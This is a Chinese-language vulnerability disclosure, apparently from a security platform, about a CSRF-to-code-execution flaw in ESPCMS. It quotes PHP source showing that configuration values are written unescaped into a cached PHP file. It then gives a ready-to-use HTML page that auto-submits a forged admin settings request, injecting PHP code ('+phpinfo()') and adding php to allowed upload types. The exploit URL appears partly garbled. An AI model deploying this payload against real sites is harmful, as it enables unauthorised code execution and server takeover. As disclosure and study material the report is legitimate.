### 简要描述:
espcms 最新版本csrf 直接getshell
### 详细说明:
这里我们首先看看,存在的代码问题
management.php:(lines:711-741):
```
function onsetsave() {
$db_table = db_prefix . 'config';
$commandfile = admin_ROOT . 'datacache/command.php';
if (!$this->fun->filemode($commandfile)) {
exit('false');
}
$old_ishtml = $this->CON['is_html'];
$sql = 'SELECT * FROM ' . $db_table . ' WHERE groupid<=8 AND isline=0 ORDER BY groupid';
$rs = $this->db->query($sql);
while ($rsList = $this->db->fetch_assoc($rs)) {
if ($rsList['groupid'] == 5 && !$this->get_app_view('bbs', 'isetup')) {
continue;
}
if ($rsList['groupid'] == 7 && !$this->get_app_view('touch', 'isetup')) {
continue;
}
if ($rsList['groupid'] == 8 && !$this->get_app_view('im', 'isetup')) {
continue;
}
$db_set = "value='" . $this->fun->accept($rsList['valname'], 'P') . "'";
$db_where = 'id=' . $rsList['id'];
$this->db->query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where);
}
$this->db->query("UPDATE $db_table SET value='" . admin_URL . "' WHERE valname='domain'");
$this->systemfile(true);
```
看到这个函数我们跟进去看看$this->systemfile(true):
class_connector.php:(lines:514-543):
```
function systemfile($trueclass = false) {
$commandfile = admin_ROOT . 'datacache/command.php';
$varget = "4:'1T<#HO+W=W=RYE8VES<\"YC;B\`";
if (!is_file($commandfile) || $trueclass) {
$sConfig = "<?php\n";
$sConfig = $sConfig . '// uptime:' . date('Y-m-d H:i:s', time()) . "\n";
$sConfig = $sConfig . "// ECISP.CN \n";
$sConfig = $sConfig . "\$CONFIG=Array(\n";
$db_table = db_prefix . 'config';
$sql = "SELECT valname,content,value,valtype FROM $db_table where isline=0 ORDER BY groupid";
$rs = $this->db->query($sql);
while ($rsList = $this->db->fetch_assoc($rs)) {
$valname = $rsList['valname'];
$value = $rsList['value'];
$valtype = $rsList['valtype'];
$content = $rsList['content'];
if ($valtype == 'int' || $valtype == 'bool') {
$value = empty($value) ? 0 : $value;
$sConfig = $sConfig . "\x20\x20\x20\x20 '" . $valname . '\'=>' . $value . ",\n";
} else {
$sConfig = $sConfig . "\x20\x20\x20\x20 '" . $valname . '\'=>\'' . $value . "',\n";
}
}
$sConfig = $sConfig . ")\n";
$sConfig = $sConfig . '?' . '>';
if (!$this->fun->filewrite($commandfile, $sConfig)) {
exit('System File Error!');
}
}
include $commandfile;
```
这里我们看明白了已经,这里从数据库里面原封不动的取出来,然后写进缓存配置文件的,那我们举例子分析一下
如果我们配置的是sss' 那么gpc就会给我们转义为sss\' 存储到数据库,但是我们二次取出来的时候就变成了sss'所以这里我们写配置文件的时候特殊字符等于没有做任何处理。
直接看我操作:
[<img src="https://images.seebug.org/upload/201409/111429125550a12c5eece093ed4bb64bc388b2d1.png" alt="15.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/111429125550a12c5eece093ed4bb64bc388b2d1.png)
我们去访问一下这个command.php,看看效果:
[<img src="https://images.seebug.org/upload/201409/11143004260d507b04d51f599d1554c486206d65.png" alt="16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/11143004260d507b04d51f599d1554c486206d65.png)
完美执行..........
```
<html>
<body>
<script>
function csrf_shell(){
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.10.70/ESPCMSV6000140909_INSTALLhttps://images.seebug.org/upload/adminsoft/index.php?archive=management&action=setsave", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body='is_close=0&close_content=%E6%8A%B1%E6%AD%89%EF%BC%9A%E7%BD%91%E7%AB%99%E6%AD%A3%E5%9C%A8%E7%BB%B4%E6%8A%A4%E4%B8%AD%EF%BC%8C%E7%BB%99%E6%82%A8%E5%B8%A6%E6%9D%A5%E4%B8%8D%E4%BE%BF%E6%B7%B1%E8%A1%A8%E6%AD%89%E6%84%8F%EF%BC%81'%2Bphpinfo()%2C%2F%2F&icpbeian=&sitename=test&admine_mail=admin%40admin.com&is_log=1&is_gzip=1&cli_time=8&default_lng=cn&is_alonelng=0&home_lng=cn&is_html=0&is_rewrite=0&file_fileex=html&entrance_file=index&file_htmldir=html%2F&is_getcache=0&is_caching=0&cache_time=3600&http_pathtype=1&member_menu=1&mem_isclose=1&mem_isseccode=1&mem_regisseccode=0&mem_isemail=0&mem_lock=www%2Cbbs%2Cdemo%2Ctest%2Cftp%2Cmail%2Cuser%2Cusers%2Cadmin%2Cadministrator&mem_isclass=0&mem_did=cn%3A0%2Cen%3A0&mem_isaddress=0&mem_isucenter=0&mem_ucdbhost=localhost&mem_ucdbuser=root&mem_ucdbpw=&mem_ucdbname=ucenter&mem_ucdbchart=utf8&mem_ucdbtable=uc_&mem_uckey=sdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&mem_ucapi=&mem_ucchart=utf-8&mem_ucapiid=0&enquiry_menu=1&is_enquiry_memclass=0&order_menu=1&order_ismember=1&order_integral=10&order_discount=100&order_snfont=ESP-&order_moneytype=%EF%BF%A5&order_max_list=3&order_companyname=&order_contact=&order_province=&order_city=&order_add=&order_post=&order_tel=&order_moblie=&upfile_pictype=jpg%7Cpng%7Cgif%7Cphp&uifile_movertype=swf%7Cmpg%7Cflv%7Cmp4&upfile_filetype=zip%7Crar%7Cdoc%7Cxls%7Cpdf&upfile_maxsize=100000000&img_dirtype=m3&img_cfiletype=d&img_width=200&img_height=200&img_bgcolor=%23ffffff&img_quality=80&img_issmallpic=0&img_iszoom=1&img_iswater=0&img_wmt_text=ESPCMS&img_wmt_size=25&img_wmt_color=%23ffffff&img_wmt_pos=9&img_wmt_transparent=20&img_wmi_file=watermark.png&img_wmi_pos=9&img_wmi_transparent=50&input_isdes=1&input_isdescription=250&input_isdellink=0&is_inputclose=1&input_click=0&is_keylink=1&input_color=%23000000&is_email=0&smtp_type=2&mail_cat=1&smtp_server=&smtp_port=25&mail_send=&smtp_username=&smtp_password=&is_moblie=0&moblie_userid=&moblie_smssnid=&moblie_smskey=&moblie_number=&sitecoedb=7a6355a4a18b136036439cc61efe069b&scode_bgcolor=%230080ff&scode_fontcolor=%23ffffff&scode_adulterate=1&scode_shadow=0&tip_searchtime=10';
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
csrf_shell();
</script>
</body>
</html>
```
完了
### 漏洞证明:
暂无评论